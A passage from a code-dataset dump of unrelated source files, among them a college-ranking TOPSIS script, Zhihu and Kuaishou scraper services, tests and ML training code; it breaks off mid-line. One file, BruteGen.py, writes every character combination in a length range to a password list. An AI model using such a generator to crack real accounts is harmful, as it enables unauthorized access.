self.possibleColleges.append(self.allColleges.collegeDict[name])\n\n def pickByFixedColleges(self, colleges):\n ans = set(colleges)\n if len(ans) != self.collegeNumber:\n raise Exception(\"学校列表出现大小错误\")\n return ans\n\n def initializeColZero(self):\n \"\"\"\n 初始化第一列\n :return:\n \"\"\"\n if not self.student.wantedMajors :\n uti.Majors.initializeClass()\n for row, college in enumerate(self.possibleColleges) :\n self.rMatrix[row][0] = 1.0\n else :\n for row, college in enumerate(self.possibleColleges):\n self.rMatrix[row][0] = max([college.getMostSimilarMajorValue(loved) for loved in self.student.wantedMajors])\n\n def initializeColOne(self):\n \"\"\"\n 保研率与深造率\n :return:\n \"\"\"\n choice = input(\"study(1) or job(0) : \")\n if choice == \"1\":\n for row, college in enumerate(self.possibleColleges):\n self.rMatrix[row][1] = college.furtherStudyRate\n else:\n for row, college in enumerate(self.possibleColleges):\n self.rMatrix[row][1] = college.workRate\n\n def initializeColTwo(self):\n \"\"\"\n :return:\n \"\"\"\n for row, college in 
enumerate(self.possibleColleges):\n self.rMatrix[row][2] = college.schoolScore\n\n def initializeColThree(self):\n \"\"\"\n\n :return:\n \"\"\"\n print(\"请对以下地理位置进行排序 : \".center(25, \"*\"))\n locations = list(set([college.location for college in self.possibleColleges]))\n print(\"请选择 : \")\n print(locations)\n input()\n decisions = self.buildWeightMatrix(len(locations), 9)\n print(\"选择为 :\\r\\n\", decisions)\n weights = self.getWeightVector(decisions, len(locations))\n print(\"权重向量为 :\\r\\n\", weights)\n for row, location in enumerate(locations):\n for i, college in enumerate(self.possibleColleges):\n if college.location == location:\n self.rMatrix[i][3] = weights[row]\n\n def initializeColFour(self):\n \"\"\"\n 初始化第四行,clicks\n :return:\n \"\"\"\n for row, college in enumerate(self.possibleColleges):\n self.rMatrix[row][4] = college.totalClicks\n\n def initializeColFive(self):\n \"\"\"\n 学校的特色专业与热点行业之间的契合度\n :return:\n \"\"\"\n\n for row, college in enumerate(self.possibleColleges):\n self.rMatrix[row][5] = max(\n [college.getMostSimilarMajorValue(hotMajor) for hotMajor in uti.Majors.hotMajors])\n\n def buildWeightMatrix(self, n: int, bound=9):\n \"\"\"\n 生成 n*n 的正互反矩阵\n :param n:\n :return:\n \"\"\"\n mat = np.zeros((n, n))\n for row in range(n):\n for col in range(row, n):\n if row == col:\n mat[row][col] = 1.0\n else:\n t = random.randint(0, 1)\n if t:\n mat[row][col] = 1.0 * random.randint(1, bound)\n mat[col][row] = 1 / mat[row][col]\n else:\n mat[col][row] = 1.0 * random.randint(1, bound)\n mat[row][col] = 1 / mat[col][row]\n return mat\n\n def getWeightVector(self, mat: np.array, n):\n \"\"\"\n 获取 n*n 的正互反矩阵的权重向量\n :param mat:\n :param n:\n :return:\n \"\"\"\n vector = np.sum(mat, axis=1).reshape((-1, 1))\n vector = vector / n\n vector = self.normalizeMatrix(vector)\n return vector\n\n def normalizeMatrix(self, matrix):\n length = math.sqrt(np.sum(matrix ** 2))\n return matrix / length\n\n def calculate(self) :\n v = np.zeros((6, 6) )\n for i in range(6) :\n v[i][i] = self.weightVector[i]\n temp = self.rMatrix.dot(v)\n minVector = np.min(temp, axis=0)\n maxVector = np.max(temp, axis=0)\n print(\"temp is \\r\\n\", temp)\n print(\"minVector is \\r\\n\", minVector)\n print(\"maxVector is \\r\\n\", maxVector)\n ansList = []\n for row in range(self.collegeNumber) :\n vector = temp[row, :]\n D2Min, D2Max = self.getD1D2(minVector, maxVector, vector)\n k = D2Min / (D2Max + D2Min)\n ansList.append( (k, self.possibleColleges[row] ) )\n return ansList\n\n def getFinal(self, n : int) :\n ansList = self.calculate()\n t = sorted(ansList, key= lambda x : x[0],reverse=True)\n print(\"\\r\\n\", \"\".center(25, \"*\") )\n for e in t :\n print(str(e[0]), str(e[1]) )\n print(\"\\r\\n推荐的决策为 : \")\n for i in range(n) :\n print(str(i + 1).center(25, \"*\"))\n print(str(t[i][0]), str(t[i][1]))\n\n def getAns2(self) :\n for col in range(6) :\n tempList = []\n tempCol = self.rMatrix[ : , col]\n for row in range(self.collegeNumber) :\n tempList.append( (tempCol[row], row) )\n tempList = sorted(tempList, key= lambda x: x[0], reverse=True)\n print()\n if col == 0 :\n print(\"理想专业与学校特色专业的匹配度 : \".center(25, \"*\"))\n elif col == 1 :\n print(\"就业深造机会 : \".center(25, \"*\"))\n elif col == 2 :\n print(\"整体实力 : \".center(25, \"*\"))\n elif col == 3 :\n print(\"地理位置 : \".center(25, \"*\"))\n elif col == 4 :\n print(\"社会认可度 : \".center(25, \"*\"))\n elif col == 5 :\n print(\"学校专业与热门专业的契合度 : \".center(25, \"*\"))\n for i in range(10) :\n print(tempList[i][0], self.possibleColleges[tempList[i][1]].name)\n\n def 
getD1D2(self, minVector, maxVector, temp) :\n return (self.calculateDistance(minVector, temp), self.calculateDistance(maxVector, temp) )\n\n def calculateDistance(self, vector1, vector2) :\n delta = vector1 - vector2\n delta = delta ** 2\n sumDelta = np.sum(delta)\n return math.sqrt(sumDelta)\n\n def normalizeMatrixByCols(self, matrix : np.array) :\n \"\"\"\n 对矩阵的每个列进行归一化\n :param matrix:\n :return:\n \"\"\"\n for col in range(6) :\n colVector = matrix[: , col ]\n colVector = self.normalizeMatrix(colVector)\n for raw in range(self.collegeNumber) :\n matrix[raw][col] = colVector[raw]\n return matrix\n\n\n\n\n\n\n\n\n","sub_path":"2019校赛数模/group_a/Topsis.py","file_name":"Topsis.py","file_ext":"py","file_size_in_byte":13651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"612740912","text":"import requests\nfrom lxml import html\n\ndef main():\n user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'\n session = requests.session()\n session.headers.update({'user_agent':user_agent})\n initial_url = 'https://www.ligloo.fr/annonce-immobiliere/{0}.html#!/?page={1}&tri=pertinance'\n categories = ('STUDIO', 'LOFTS', 'MAISON', 'APPART-2-PIECES-MOINS-DE-40-M2')\n for category in categories:\n dictionary_of_links = {}\n for page in range(1, 6):\n url = initial_url.format(category, page)\n print(url)\n result = session.get(url)\n tree = html.fromstring(result.text) #why tree is the same every time?\n\nprint(main())\n","sub_path":"scrapy_projt/python_request_module_post/request_session_ecommerce.py","file_name":"request_session_ecommerce.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"630346444","text":"import adv_test\nimport adv\nfrom slot.d import *\n\ndef module():\n return Waike\n\n\nclass Waike(adv.Adv):\n comment = 'no bog'\n\n def d_slots(this):\n #this.conf.slot.d = DJ()\n return\n\n def prerun(this):\n if this.condition('c4+fs'):\n this.conf['acl'] = \"\"\"\n `s1, fsc\n `s2, fsc\n `s3, fsc\n `fs, seq=4\n \"\"\"\n\nif __name__ == '__main__':\n conf = {}\n conf['acl'] = \"\"\"\n `s1, seq=5 or fsc\n `s2, seq=5 or fsc\n `s3, seq=5 or fsc\n \"\"\"\n adv_test.test(module(), conf, verbose=0)\n\n","sub_path":"adv/waike.py","file_name":"waike.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"44592306","text":"from concurrent import futures\nimport os\nimport sys\nimport grpc\nimport json\n\ncurrent_path = os.path.realpath(__file__)\nroot_path = os.path.dirname(os.path.dirname(os.path.dirname(current_path)))\nsys.path.append(root_path)\n\nimport server.spider.spider_pb2 as spider_pb2\nimport server.spider.spider_pb2_grpc as spider_pd2_grpc\nfrom Logger import log\nfrom conf.conf import Config\nfrom server.spider.logic.zhihu import ZhihuClient\nfrom server.spider.logic.kuaishou import KuaishouClientV2\n\nconf = Config()\nzh_client = ZhihuClient(cookie=conf.zhihu_cookie)\n\nks_client = KuaishouClientV2()\n\n\nclass Spider(spider_pd2_grpc.SpiderServicer):\n def Zhihu(self, request, content):\n try:\n data = request.data\n data = json.loads(data)\n t = data.get('type', None)\n if t not in ['question', 'answer']:\n results = {'status_code': 400, 'message': 'invalid type'}\n return spider_pb2.Results(\n result=json.dumps(results, ensure_ascii=False))\n page = int(data.get('page', 
1))\n if t == 'question':\n kw = data.get('kw', '')\n if not kw:\n results = {'status_code': 400, 'message': 'invalid kw'}\n return spider_pb2.Results(\n result=json.dumps(results, ensure_ascii=False))\n results, code = zh_client.search(type=t, kw=kw, page=page)\n if code != 200:\n results = {\n 'status_code': code,\n 'message': 'error happened'\n }\n return spider_pb2.Results(\n result=json.dumps(results, ensure_ascii=False))\n results = {'status_code': code, 'message': '', 'data': results}\n return spider_pb2.Results(\n result=json.dumps(results, ensure_ascii=False))\n elif t == 'answer':\n question_id = data.get('question_id', '')\n if not question_id:\n results = {\n 'status_code': 400,\n 'message': 'invalid question_id'\n }\n return spider_pb2.Results(\n result=json.dumps(results, ensure_ascii=False))\n results, code = zh_client.search(type=t,\n question_id=question_id,\n page=page)\n if code != 200:\n results = {\n 'status_code': code,\n 'message': 'error happened'\n }\n return spider_pb2.Results(\n result=json.dumps(results, ensure_ascii=False))\n results = {'status_code': code, 'message': '', 'data': results}\n return spider_pb2.Results(\n result=json.dumps(results, ensure_ascii=False))\n except Exception as e:\n msg = 'On line {} - {}'.format(sys.exc_info()[2].tb_lineno, e)\n log('Spider.Zhihu').logger.error(msg)\n return\n\n def Kuaishou(self, request, content):\n try:\n data = request.data\n data = json.loads(data)\n cookie = data.get('cookie', None)\n if cookie is None:\n results = {\n 'status_code': 400,\n 'message': 'cookie can not be none'\n }\n return spider_pb2.Results(\n result=json.dumps(results, ensure_ascii=False))\n t = data.get('type', None)\n if t == 'video':\n obj = data.get('user_id', None)\n elif t == 'search':\n obj = data.get('kw', None)\n elif t == 'comment':\n obj = data.get('video_id', None)\n else:\n obj = None\n if obj is None:\n results = {\n 'status_code': 400,\n 'message': 'obj can not be none'\n }\n return spider_pb2.Results(\n result=json.dumps(results, ensure_ascii=False))\n pcursor = data.get('pcursor', None)\n res, code = ks_client.getData(t=t,\n obj=obj,\n cookie=cookie,\n pcursor=pcursor)\n if code != 200:\n if code == 404:\n results = {\n 'status_code': code,\n 'message': 'error in requests'\n }\n return spider_pb2.Results(\n result=json.dumps(results, ensure_ascii=False))\n else:\n results = {\n 'status_code': code,\n 'message': 'error happened in code'\n }\n return spider_pb2.Results(\n result=json.dumps(results, ensure_ascii=False))\n else:\n results = {'status_code': code, 'message': '', 'data': res}\n return spider_pb2.Results(\n result=json.dumps(results, ensure_ascii=False))\n except Exception as e:\n msg = 'On line {} - {}'.format(sys.exc_info()[2].tb_lineno, e)\n log('Spider.Zhihu').logger.error(msg)\n results = {\n 'status_code': 400,\n 'message': msg,\n }\n return spider_pb2.Results(\n result=json.dumps(results, ensure_ascii=False))\n\n\ndef serve():\n server = grpc.server(futures.ThreadPoolExecutor(max_workers=2))\n spider_pd2_grpc.add_SpiderServicer_to_server(Spider(), server)\n server.add_insecure_port('[::]:50052')\n server.start()\n server.wait_for_termination()\n\n\nif __name__ == '__main__':\n serve()\n","sub_path":"server/spider/spider_server.py","file_name":"spider_server.py","file_ext":"py","file_size_in_byte":5991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"432223971","text":"# Copyright 2017-2019 TensorHub, Inc.\n#\n# Licensed under the Apache License, Version 
2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import absolute_import\nfrom __future__ import division\n\nimport re\nimport logging\n\nlog = logging.getLogger(\"guild\")\n\nclass OutputScalars(object):\n\n def __init__(self, config, run):\n self._patterns, self._step_pattern = self._compile_patterns(config)\n self._run = run\n self._writer = None\n self._step = None\n\n @staticmethod\n def _compile_patterns(config):\n patterns = []\n step_pattern = None\n for key, val in sorted(config.items()):\n try:\n pattern = re.compile(val)\n except Exception as e:\n log.warning(\n \"error compiling pattern %s for \"\n \"output scalar %s: %s\", val, key, e)\n else:\n if pattern.groups != 1:\n log.warning(\n \"pattern %s captures %i group(s), \"\n \"expected 1 - skipping\", val,\n pattern.groups)\n continue\n if key == \"step\":\n step_pattern = pattern\n else:\n patterns.append((key, pattern))\n return patterns, step_pattern\n\n def write(self, line):\n self._refresh_step(line)\n for key, pattern in self._patterns:\n val = self._try_float(pattern, line)\n if val is not None:\n writer = self._ensure_writer()\n writer.add_scalar(key, val, self._step)\n\n def _refresh_step(self, out):\n if self._step_pattern:\n maybe_step = self._try_int(self._step_pattern, out)\n if maybe_step:\n self._step = maybe_step\n\n def _try_float(self, pattern, s):\n return self._gen_try(pattern, s, float)\n\n def _try_int(self, pattern, s):\n return self._gen_try(pattern, s, int)\n\n @staticmethod\n def _gen_try(pattern, s, type_conv):\n m = pattern.search(s.decode())\n if not m:\n return None\n try:\n return type_conv(m.group(1))\n except ValueError:\n return None\n\n def _ensure_writer(self):\n import tensorboardX\n if self._writer is None:\n run_guild_dir = self._run.guild_path()\n self._writer = tensorboardX.SummaryWriter(run_guild_dir)\n return self._writer\n\n def close(self):\n if self._writer:\n self._writer.close()\n","sub_path":"guild/summary.py","file_name":"summary.py","file_ext":"py","file_size_in_byte":3005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"158726781","text":"from MyModules import InputValidator\r\n\r\n\r\ndef calcPercent(total, part):\r\n\treturn (part/total)*100\r\n\r\n# Holds the candidate information\r\n# Candidates will be accessed by CANDIDATE[NAME][VOTES]\r\nCANDIDATES = []\r\nCANDIDATE_NAME = 0\r\nCANDIDATE_VOTES = 1\r\n\r\n# Input and message constants\r\nENTER_CANDIDATES_INPUT = \"Enter the number of candidates in the election:\"\r\nENTER_CANDIDATE_NAME = \"Enter the name of candidate #{}: \"\r\nENTER_CANDIDATES_VOTE = \"Enter the number of votes for {}: \"\r\n\r\nRESULTS\t\t\t\t\t= \"{} : {:.0f}% {}\"\r\nRESULT_PADDING = 25\r\nLOSE_MESSAGE\t\t\t= \"Lowest total votes\"\r\nWIN_MESSAGE\t\t\t\t= \"Winner!\"\r\nNEUTRAL_MESSAGE\t\t\t= \"\"\r\nERROR_MESSAGE = \"Oops! 
That's not a valid value\"\r\nLINE_BREAK = \"----------------------------------------\"\r\n\r\nprint(\"Welcome to Gigi's Election Calculator!\")\r\n\r\n# Determine the number of candidates\r\nnumCandidate = input(ENTER_CANDIDATES_INPUT)\r\nwhile InputValidator.isInt(numCandidate) == False or int(numCandidate) <= 0:\r\n print(ERROR_MESSAGE)\r\n numCandidate = input(ENTER_CANDIDATES_INPUT)\r\nnumCandidate = int(numCandidate)\r\n\r\n# Holds the total number of votes\r\ntotalVotes \t= 0\r\nhighest \t= 0\r\nlowest \t\t= 0\r\n\r\n# Collect the required amount of candidates\r\nfor i in range(1, numCandidate+1):\r\n # Get the candidates name\r\n name = input(ENTER_CANDIDATE_NAME.format(i))\r\n\r\n # Get the number of votes for the candidate\r\n votes = input(ENTER_CANDIDATES_VOTE.format(name))\r\n while InputValidator.isInt(votes) == False or int(votes) < 0:\r\n print(ERROR_MESSAGE)\r\n votes = input(ENTER_CANDIDATES_VOTE.format(name))\r\n votes = int(votes)\r\n totalVotes += votes\r\n\r\n if lowest == 0:\r\n lowest = votes\r\n elif votes < lowest:\r\n lowest = votes\r\n\r\n if highest < votes:\r\n highest = votes\r\n\r\n # Add the candidates name and number of votes to the candidates array\r\n CANDIDATES.append([name,votes])\r\n print()\r\n\r\n\r\nprint(LINE_BREAK)\r\n\r\n\r\n# Print the results of the election, and set the winning message\r\nfor candidate in CANDIDATES:\r\n if candidate[CANDIDATE_VOTES] == lowest:\r\n result = LOSE_MESSAGE\r\n elif candidate[CANDIDATE_VOTES] == highest:\r\n result = WIN_MESSAGE\r\n else:\r\n result = NEUTRAL_MESSAGE\r\n\r\n\t# Print the results with formatting applied in the format string\r\n print(RESULTS.format(candidate[CANDIDATE_NAME].ljust(RESULT_PADDING, \" \"), calcPercent(totalVotes, candidate[CANDIDATE_VOTES]), result))\r\n","sub_path":"Assignment3/Election.py","file_name":"Election.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"30603336","text":"import msvcrt\r\n\r\ngen = 0\r\n\r\ndef generar(dic,cnt,pref):\r\n global gen\r\n if msvcrt.kbhit():\r\n char = msvcrt.getwch()\r\n if (char == '\\x1b'):\r\n raise ValueError(\"Se ha parado la generación.\")\r\n if cnt == 0:\r\n f.write(pref+\"\\n\")\r\n gen += 1\r\n if (gen == int(lines*0.1)):\r\n print(\"10%\")\r\n print()\r\n elif (gen == int(lines*0.2)):\r\n print(\"20%\")\r\n print()\r\n elif (gen == int(lines*0.3)):\r\n print(\"30%\")\r\n print()\r\n if (gen == int(lines*0.4)):\r\n print(\"40%\")\r\n print()\r\n elif (gen == int(lines*0.5)):\r\n print(\"50%\")\r\n print()\r\n elif (gen == int(lines*0.6)):\r\n print(\"60%\")\r\n print()\r\n if (gen == int(lines*0.7)):\r\n print(\"70%\")\r\n print()\r\n elif (gen == int(lines*0.8)):\r\n print(\"80%\")\r\n print()\r\n elif (gen == int(lines*0.9)):\r\n print(\"90%\")\r\n print()\r\n else:\r\n for char in dic:\r\n generar(dic, cnt-1, pref+char)\r\n\r\ndef elevar(b,e):\r\n res = b\r\n for i in range(0,e-1):\r\n res *= b\r\n return res\r\n\r\nf = open(\"pswds.txt\", \"w\")\r\n\r\n\r\n\r\nmini = int(input(\"Número mínimo de caracteres: \"))\r\nmaxi = int(input(\"Número máximo de caracteres: \"))\r\nchars = input(\"Caracteres a usar: \")\r\ndic = []\r\n\r\nfor c in chars:\r\n if not (c in dic):\r\n dic.append(c)\r\ndic.sort()\r\n\r\nlines = dskSpc = 0\r\n\r\nfor i in range(mini,maxi+1):\r\n lines += elevar(len(dic), i)\r\n dskSpc += ((lines * (i+2))-3) * 0.0000009488103185\r\n\r\ndskSpc = str(dskSpc)\r\n\r\ngo = input(\"Se van a generar \" + str(lines) + \" combinaciones que 
ocuparán \" + dskSpc[:dskSpc.find(\".\")+3] + \"MB. ¿Quieres continuar? (S/N) \")\r\n\r\nwhile (go != 's' and go != 'S' and go != 'n' and go != 'N'):\r\n go = input(\"Esa no es una opción válida, vuelve a introducir: \")\r\n\r\nif (go == 's' or go == 'S'):\r\n print(\"En caso de querer parar la ejecución pulsa la tecla ESC.\")\r\n try:\r\n for i in range(mini,maxi+1):\r\n generar(dic,i,\"\")\r\n print(\"Se han generado todas las combinaciones.\")\r\n except ValueError as e:\r\n print(e)\r\n f.close()\r\n\r\nf.close()\r\nif (go == 'n' or go == 'N'):\r\n print(\"Fin del programa.\")","sub_path":"BruteGen.py","file_name":"BruteGen.py","file_ext":"py","file_size_in_byte":2331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"185227362","text":"import tensorflow as tf \nfrom tensorflow import keras\n\n\ndef networkRecorder(logdir, model, input_shape):\n @tf.function\n def forward(model, x): return model(x)\n x = tf.zeros(input_shape)\n writer = tf.summary.create_file_writer(logdir)\n tf.summary.trace_on(graph=True, profiler=True)\n forward(model, x)\n with writer.as_default():\n tf.summary.trace_export(name='model_trace', step=0, profiler_outdir=logdir)\n\n\nif __name__ == '__main__':\n from datetime import datetime\n from resnet import resnet50\n stamp = datetime.now().strftime(\"%Y%m%d-%H%M%S\")\n logdir = '.\\logs\\%s' % stamp\n shape = [1, 224, 224, 3]\n networkRecorder(logdir, resnet50(), shape)\n","sub_path":"visual_network.py","file_name":"visual_network.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"396041032","text":"def isValid(self, s: str) -> bool:\n stack=[\"?\"]\n mapping = {\"(\": \")\", \"[\": \"]\", \"{\": \"}\", \"?\": \"?\"}\n for i in s:\n if i in mapping:\n stack.append(i)\n continue\n elif mapping[stack.pop()]!=i:\n return False\n\n return len(stack) ==1\n\n# 字典存好三种括号,键值对","sub_path":"Week_01/有效的括号.py","file_name":"有效的括号.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"526981537","text":"# Copyright (c) 2019 Digital Asset (Switzerland) GmbH and/or its affiliates. All rights reserved.\n# SPDX-License-Identifier: Apache-2.0\n\n\nfrom datetime import datetime\nfrom typing import Iterator, Optional\n\n# noinspection PyPackageRequirements\nfrom grpc import RpcError, StatusCode\n\nfrom ... import LOG\nfrom .pb_parse_event import to_datetime\n\n\ndef maybe_grpc_time_stream(time_service: 'G.TimeServiceStub', ledger_id: str) \\\n -> Optional[Iterator[datetime]]:\n \"\"\"\n Return an iterator over times that monotonically increases, or ``None`` if the TimeService is\n not implemented by the remote server.\n\n :param time_service:\n :param ledger_id:\n :return:\n \"\"\"\n from . 
import model as G\n request = G.GetTimeRequest(ledger_id=ledger_id)\n\n time_stream = time_service.GetTime(request)\n try:\n return _TimeStream(time_stream)\n except StaticTimeUnsupportedError:\n LOG.debug('Operating in real-time mode.')\n return None\n\n\nclass _TimeStream(Iterator[datetime]):\n\n def __init__(self, time_stream):\n try:\n self.time_stream_iter = iter(time_stream)\n self.time_queue = [to_datetime(next(self.time_stream_iter).current_time)]\n except RpcError as ex:\n status_code = ex.code()\n if status_code == StatusCode.UNIMPLEMENTED:\n raise StaticTimeUnsupportedError()\n\n def __iter__(self):\n return self\n\n def __next__(self):\n try:\n return self.time_queue.pop()\n except IndexError:\n pass\n\n try:\n dt = to_datetime(next(self.time_stream_iter).current_time)\n LOG.debug('Got a new time: %s', dt)\n return dt\n except RpcError as ex:\n status_code = ex.code()\n if status_code == StatusCode.CANCELLED:\n # a cancelled code is fine; that just means the underlying time stream connection is\n # closed (which also means this function is done with its work)\n raise StopIteration\n else:\n raise\n\n\nclass StaticTimeUnsupportedError(Exception):\n pass\n","sub_path":"python/dazl/protocols/v1/grpc_time.py","file_name":"grpc_time.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"49906834","text":"#!/usr/bin/env python3 -B\nimport unittest\nimport os\nimport os.path\nimport hashlib\nimport json\nimport uuid\nimport pprint\n\nfrom tests import TestWriter, SalesTestPipeline, MODELS\nfrom cromulent import vocab\n\nvocab.add_attribute_assignment_check()\n\nclass TestSalesPipelineOutput(unittest.TestCase):\n '''\n Parse test CSV data and run the Provenance pipeline with the in-memory TestWriter.\n Then verify that the serializations in the TestWriter object are what was expected.\n '''\n def setUp(self):\n self.catalogs = {\n 'header_file': 'tests/data/sales/sales_catalogs_info_0.csv',\n 'files_pattern': 'tests/data/sales/sales_catalogs_info.csv',\n }\n self.contents = {\n 'header_file': 'tests/data/sales/sales_contents_0.csv',\n 'files_pattern': 'tests/data/sales/sales_contents_1.csv',\n }\n self.auction_events = {\n 'header_file': 'tests/data/sales/sales_descriptions_0.csv',\n 'files_pattern': 'tests/data/sales/sales_descriptions.csv',\n }\n os.environ['QUIET'] = '1'\n\n def tearDown(self):\n pass\n\n def run_pipeline(self, models, input_path):\n writer = TestWriter()\n pipeline = SalesTestPipeline(\n writer,\n input_path,\n catalogs=self.catalogs,\n auction_events=self.auction_events,\n contents=self.contents,\n models=models,\n limit=10,\n debug=True\n )\n pipeline.run()\n return writer.processed_output()\n\n def verify_auction(self, a, event, idents):\n got_events = {c['_label'] for c in a.get('part_of', [])}\n self.assertEqual(got_events, {f'Auction Event {event}'})\n got_idents = {c['content'] for c in a.get('identified_by', [])}\n self.assertEqual(got_idents, idents)\n\n def test_pipeline_sales(self):\n input_path = os.getcwd()\n models = MODELS\n output = self.run_pipeline(models, input_path)\n\n objects = output['model-object']\n los = output['model-lo']\n people = output['model-person']\n prov = output['model-activity']\n activities = output['model-sale-activity']\n groups = output['model-groups']\n AUCTION_HOUSE_TYPE = 'http://vocab.getty.edu/aat/300417515'\n houses = {k: h for k, h in groups.items()\n if h.get('classified_as', [{}])[0].get('id') == AUCTION_HOUSE_TYPE}\n\n 
self.assertEqual(len(people), 4, 'expected count of people') # 3 from the data, and 1 (Lugt) which is a static instance\n self.assertEqual(len(objects), 6, 'expected count of physical objects')\n self.assertEqual(len(los), 10, 'expected count of linguistic objects')\n self.assertEqual(len(prov), 2, 'expected count of prov entries') # 2 prov entries\n self.assertEqual(len(activities), 3, 'expected count of sale activities') # 1 auction event, 2 auctions of lot\n self.assertEqual(len(houses), 1, 'expected count of auction houses')\n\n object_types = {c['_label'] for o in objects.values() for c in o.get('classified_as', [])}\n self.assertEqual(object_types, {'Auction Catalog', 'Painting'})\n\n lo_types = {c['_label'] for o in los.values() for c in o.get('classified_as', [])}\n self.assertEqual(lo_types, {'Auction Catalog', 'Catalog', 'Entry', 'Database', 'Electronic Records'})\n\n people_names = {o['_label'] for o in people.values()}\n self.assertEqual(people_names, {'Frits Lugt', '[Anonymous]', 'GILLEMANS, JAN PAUWEL', 'VINCKEBOONS, DAVID'})\n\n key_119 = 'tag:getty.edu,2019:digital:pipeline:REPLACE-WITH-UUID:sales#AUCTION,B-A139,0119,1774-05-31'\n key_120 = 'tag:getty.edu,2019:digital:pipeline:REPLACE-WITH-UUID:sales#AUCTION,B-A139,0120,1774-05-31'\n\n auction_B_A139_0119 = activities[key_119]\n self.verify_auction(auction_B_A139_0119, event='B-A139 (1774-05-31 onwards)', idents={'0119[a]', '0119[b]', 'Auction of Lot B-A139 0119 (1774-05-31)'})\n\n auction_B_A139_0120 = activities[key_120]\n self.verify_auction(auction_B_A139_0120, event='B-A139 (1774-05-31 onwards)', idents={'0120', 'Auction of Lot B-A139 0120 (1774-05-31)'})\n\n house_ids = {o['id'] for o in houses.values()}\n house_types = {c['_label'] for o in houses.values() for c in o.get('classified_as', [])}\n self.assertEqual(house_types, {'Auction House (organization)'})\n\n offer_labels = {p['_label'] for p in prov.values()}\n self.assertEqual(offer_labels, {'Offer of B-A139 0119 (1774-05-31)', 'Offer of B-A139 0120 (1774-05-31)'})\n\n events = [activities[k] for k in activities if k not in {key_119, key_120}]\n event_labels = {e['_label'] for e in events}\n self.assertEqual(event_labels, {'Auction Event B-A139 (1774-05-31 onwards)'})\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_sales_pipeline.py","file_name":"test_sales_pipeline.py","file_ext":"py","file_size_in_byte":4910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"1690523","text":"\n#%%\nfrom brats_data_loader import get_list_of_patients, get_train_transform, iterate_through_patients, BRATSDataLoader, get_train_transform_aggro\nfrom train_test_function import ModelTrainer\nfrom models import AlbuNet3D34, AlbuNet3D34_4channels\nfrom loss import GeneralizedDiceLoss, SimpleDiceLoss, dice_multi_class, dice\n\nfrom batchgenerators.utilities.data_splitting import get_split_deterministic\nfrom batchgenerators.dataloading import MultiThreadedAugmenter\n\n\n#%%\nimport torch\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0,1\"\n\n#%%\n# videos.py\nimport argparse\nparser = argparse.ArgumentParser(description='Train AlbuNet3D')\nparser.add_argument('-name', type=str, help='Name of the Model')\nparser.add_argument('--batch_size', type=int, help='Batch Size', default=12)\nparser.add_argument('--patch_depth', type=int, help='Depth of the Input Patch', default=24)\nparser.add_argument('--patch_width', type=int, help='Width of the Input 
Patch', default=128)\nparser.add_argument('--patch_height', type=int, help='Height of the Input Patch', default=128)\nparser.add_argument('--training_max', type=int, help='max number of patients for training', default=369)\nparser.add_argument('--training_batch_size', type=int, help='Size of minibatch in training', default=100)\nparser.add_argument('--validation_batch_size', type=int, help='Size of minibatch in validation', default=100)\nparser.add_argument('--num_channels', type=int, help='Number of input channels', default=4)\nparser.add_argument('--no_pretrained', dest='pretrained', action='store_false', help='ResNet34 without Pretraining')\nparser.set_defaults(pretrained=True)\nparser.add_argument('--brats_train_year', type=int, help='BRATS Train Dataset Year', default=20)\nparser.add_argument('--brats_test_year', type=int, help='BRATS Test Dataset Year', default=20)\nparser.add_argument('--no_validation', dest='use_validation', action='store_false', help='No Validation Set')\nparser.set_defaults(use_validation=True)\nparser.add_argument('--weight_init', dest='weight_init', action='store_false', help='Initialize weight for 4 channel AlbuNet?')\nparser.set_defaults(weight_init=True)\nparser.add_argument('--learning_rate', type=float, help='Learning Rate', default=1e-3)\nparser.add_argument('--epochs', type=int, help='Number of Training Epochs', default=50)\nparser.add_argument('--aggro_da', dest='aggro_da', action='store_true', help='Use more aggressive data augs')\nparser.set_defaults(aggro_da=False)\nparser.add_argument('--no_gpu', dest='use_gpu', action='store_false', help='Use CPU instead of GPU')\nparser.set_defaults(use_gpu=True)\nparser.add_argument('--no_multiclass', dest='multi_class', action='store_false', help='Tumor Core Only')\nparser.set_defaults(multi_class=True)\nparser.add_argument('--seed', type=int, help='PyTorch Seed for Weight Initialization', default=1234)\nargs = parser.parse_args()\n\ntorch.manual_seed(args.seed)\n\nimport logging\nlogging.basicConfig(filename=args.name + '.log',level=logging.DEBUG)\n\nlogging.info('Starting logging for {}'.format(args.name))\nlogging.info(f\"Training for: {args.epochs}\")\n\n# Training data\npatients = 